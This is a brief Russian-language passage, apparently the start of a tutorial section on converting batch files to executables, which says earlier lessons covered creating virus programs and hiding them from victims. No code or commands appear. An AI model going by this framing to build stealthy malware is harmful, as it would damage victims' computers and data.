Преобразование пакетных файлов в исполняемые файлы:

До сих пор мы видели много вещей, создавая вирусные программы, делая их незаметными при выполнении на компьютере жертвы.